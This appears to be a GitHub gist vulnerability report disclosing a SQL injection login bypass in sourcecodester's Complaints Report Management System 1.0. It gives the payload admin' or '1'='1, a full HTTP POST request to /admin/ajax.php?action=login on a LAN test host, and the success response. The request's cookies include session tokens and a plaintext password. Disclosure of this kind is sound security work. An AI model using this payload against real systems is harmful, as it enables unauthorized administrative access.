Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/sourcecodester_Complaints Report Management System_SQL_INJECTION_1.md Secret

Last active July 26, 2024 02:14
Show Gist options
  • Save topsky979/7c314add775caa87b4db700e0bef7f35 to your computer and use it in GitHub Desktop.
Save topsky979/7c314add775caa87b4db700e0bef7f35 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sourcecodester_Complaints Report Management System_SQL_INJECTION_1.md

[description]

Complaints Report Management System was discovered to contain a SQL Injection vulnerability via the URI /admin/ajax.php?action=login.

[Vulnerability Type]

SQL Injection

[Vendor of Product]

https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html

[Affected Product Code Base]

1.0

[Impact Escalation of Privileges]

true

[POC]
Use the following data as username,and any characters as password,you can login as well:

admin' or '1'='1
图片

Request :

POST /admin/ajax.php?action=login HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 43
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; PHPSESSID=pkl0j3jvobj1o9rlntnckhrfc9; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; BatchSelected=null; Path=/www/wwwroot/1111.com/admin; vcodesum=16
Connection: keep-alive

username=admin'+or+'1'%3D'1&password=123456

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 02:11:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1

1

Which '1' stands for success.Then you will be logged in the system. 图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment